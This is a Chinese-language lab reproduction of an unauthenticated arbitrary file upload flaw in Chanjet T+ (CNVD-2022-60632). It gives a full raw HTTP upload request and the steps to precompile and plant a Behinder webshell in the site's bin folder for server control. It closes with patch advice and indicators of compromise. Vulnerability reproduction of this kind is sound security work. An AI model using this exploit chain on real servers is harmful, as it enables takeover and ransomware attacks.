畅捷通T+任意文件上传漏洞复现（CNVD-2022-60632）

2022年8月29日和8月30日，畅捷通公司紧急发布安全补丁修复了畅捷通T+软件任意文件上传漏洞。未经身份认证的攻击者利用该漏洞，通过绕过系统鉴权，在特定配置环境下实现任意文件的上传，从而执行任意代码，获得服务器控制权限。目前，已有用户被不法分子利用该漏洞进行勒索病毒攻击的情况出现。

产品安装包下载地址

https://dad.chanapp.chanjet.com/TplusYZHJ17.0.zip

下载后解压如下

首先进入CheckEnvironment目录中，执行T+环境检测程序，进行安装前的环境检测

经检测，服务器环境符合要求

接下来回到T+云主机17.0目录下，执行Setup程序

选择标准版进行安装，由于本机没有安装SQL Server数据库，因此在配置数据库时不进行配置即可，安装完成后，访问http://localhost/tplus/view/login.html，显示如下则说明环境已经搭建成功

构造漏洞利用POC，发送该请求至服务器

GET /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1Host: 10.211.55.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: ASP.NET_SessionId=gvigofzulthd2v1i2q5zndtf; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1662302093; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1662302093Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundarywwk2ReqGTj7lNYltContent-Length: 181------WebKitFormBoundarywwk2ReqGTj7lNYltContent-Disposition: form-data; name="File1";filename="222.aspx"Content-Type: image/jpeg1------WebKitFormBoundarywwk2ReqGTj7lNYlt--

执行结果如下图所示

该请求包，可将文件名为222.aspx 的文件上传到远程服务器上，检查服务器上的目录，可以看到该文件已经成功上传。

接下来我们使用冰蝎自带的Webshell，通过预编译后，上传到服务器，从而获取到目标服务器的控制权限。

首先在Windows系统中对WebShell进行编译，木马文件为shell.aspx，位于C:UserssojrsDesktopshell，执行命令如下

C:WindowsMicrosoft.NETFrameworkv4.0.30319aspnet_compiler.exe -v / -p C:UserssojrsDesktopshell C:UserssojrsDesktopshell_compiled -fixednames

执行完成之后，编译后的文件会保存在C:UserssojrsDesktopshell_compiled目录

接下来我们将shell.aspx、App_Web_shell.aspx.cdcab7d2.dll、shell.aspx.cdcab7d2.compiled上传到畅捷通的网站根目录的bin文件夹下,注意在filename参数处填写待保存的文件位置。

上传成功

最后配置冰蝎的连接，可以看到成功连接

目前，畅捷通公司已紧急发布漏洞补丁修复该漏洞，CNVD建议受影响的单位和用户立即升级至最新版本：https://www.chanjetvip.com/product/goods

同时，请受漏洞影响的单位和用户立即按照以下步骤开展自查和修复工作：

1、用户自查步骤：

查询本地是否存在

website/bin/load.aspx.cdcab7d2.compiled、website/bin/App_Web_load.aspx.cdcab7d2.dll、tplus/Load.aspx文件，如存在说明已经中毒，须重装系统，并安装产品打补丁。

2、未中毒用户请：

更新最新产品补丁。

安装杀毒软件，并及时升级病毒库。

升级IIS和Nginx版本至IIS10.0和Windows 2016。

本地安装客户需尽快确认备份文件是否完整，以及做了异地备份。云上客户请及时开启镜像功能。

未能及时更新补丁的用户，可联系畅捷通技术支持，采取删除文件等临时防范措施。

3、已中毒用户请：

检查服务器是否有做定期快照或备份，如有可通过快照或备份恢复数据。

联系畅捷通技术支持，确认是否具备从备份文件恢复数据的条件及操作方法。

原文始发于微信公众号（第59号）：畅捷通T+任意文件上传漏洞复现（CNVD-2022-60632）